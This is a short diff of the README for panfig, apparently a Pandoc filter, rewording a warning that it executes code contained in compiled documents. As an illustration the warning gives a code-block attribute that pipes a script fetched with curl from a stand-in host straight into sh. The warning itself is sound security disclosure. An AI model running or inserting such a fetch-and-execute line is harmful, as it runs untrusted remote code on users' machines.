speezepearson/panfig/README.md

 -------------------------------------

 I am putting this up near the top because you should care about it.
 **Panfig executes arbitrary code contained in the document being compiled.
-If you invoked Pandoc (+Panfig) on the following document, it would own your computer.**
+If you invoked Pandoc (+Panfig) on the following document, it would do arbitrarily bad stuff.**

     ~~~~~~~~ { .panfig shell="curl http://example.com/evil_exploit.sh | sh"}